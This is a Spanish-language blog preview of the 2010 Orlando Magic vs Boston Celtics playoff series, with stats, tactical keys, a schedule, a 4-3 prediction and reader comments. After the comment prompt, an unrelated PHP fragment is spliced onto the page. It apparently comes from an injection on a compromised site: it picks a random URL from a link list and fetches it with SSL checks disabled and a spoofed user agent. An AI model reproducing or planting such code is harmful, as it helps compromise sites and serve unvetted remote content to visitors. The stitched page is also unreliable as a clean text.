Análisis Orlando Magic vs Boston Celtics

16 de May de 2010 por TheDeerHunter

Regular: 3-1 Magic

Magic: 102.8 p. Favor (6º) – 95.3 p. Contra (4º)
Celtics: 99.2 p. Favor (19º) – 95.6 p. Contra (5º)

Más difícil todavía. Los Celtics han protagonizado uno de los bombazos de este curso baloncestístico eliminando a LeBron y sus Cavaliers, dejándoles de paso en plena crisis existencial. Ahora tocan los imbatidos Orlando Magic, aparentemente la escuadra más en forma de cuantos quedan en carrera.

Orlando, como los Lakers del año pasado, han evolucionado y parecen más preparados para alcanzar el ansiado anillo. No nos hemos cansado de decir que es la plantilla más potente y compensada de todas. El chip cambia decisivamente para los Celtics, tras haber logrado mentalizarse para frenar a LeBron ahora deberán multiplicarse frente al juego coral diseñado por Stan Van Gundy.

No lo han logrado en la regular. La balanza se decanta nuevamente en favor de Orlando, con el agravante además del factor campo.  Sin embargo no nos engañemos, todos los partidos disputados este curso han sido tremendamente igualados y los Celtics han demostrado estar en el mejor estado de forma de todo el año. Se espera una serie a cara de perro.

Claves de la eliminatoria:

– Defense!! Se trata de dos de los mejores equipos defensivos de la liga. En los 4 precedentes ninguno de ellos ha pasado de los 100 puntos. Durante estos playoffs ambos han mejorado todavía más si cabe, con poco más de 90 puntos encajados por los Celtics y unos demoledores 84 puntos encajados por Orlando.

Doc Rivers vs Stan Van Gundy: La serie se la llevará quien logre adaptarse mejor a las alternativas tácticas que seguro pondrán encima de la mesa ambos ambos. Se avecina toda una partida de ajedrez.

Quinteto vs Plantilla: Todavía no nos terminamos de creer el dato de que el quinteto titular de los Celtics, aún con los problemas que ha tenido Garnett este año, sigue siendo el más potente de la liga. Se dice que los playoffs los suelen ganar 5 o 6 tíos… pero la batería que puede desplegar Orlando no tiene parangón.

Las alas: La defensa de los Celtics ha demostrado conocer el secreto para parar a Howard. Nelson y Rondo son dos de los mejores bases del Este. La batalla podría derimirse en las alas en la medida de que Allen y, sobre todo, Pierce no logren encontrar su juego. Barnes, Pietrus y Carter tienen mucho que decir a eso.

Agenda:
– P1: Hoy, 16 de mayo a las 21h30 (Hora española)
– P2: Martes, 19 de mayo a las 2h30
-P3: Sabado, 22 de mayo a las 2h30
-P4: Lunes, 24 de mayo a las 2h30
-P5: Miércoles, 26 de mayo a las 2h30
-P6: Viernes, 28 de mayo a las 2h30
– P7: Domingo, 30 de mayo a las 2h30

Pronóstico: 4-3 Orlando.

Comenta

5 comentarios a esta entrada

  1. Love Denise dice:
    #1

    en mi opinión, si las semis han sido cortas, las finales de conferencia lo van a ser aún más

      Citar

  2. Viva_Dirk dice:
    #2

    Pues yo creo que los Magics van a tener que sudar sangre para ganar a Boston….si es que lo consiguen. Si se pagase bien no me importaría apostar algun dinero por la victoria de los Celtics en esta eliminatoria.

      Citar

  3. mmmm dice:
    #3

    A mi tampoco me importaría.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    going green.. Tremenous.

      Citar

  5. Albertis dice:
    #5

    Don’t ever underestimate the heart of a champion!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>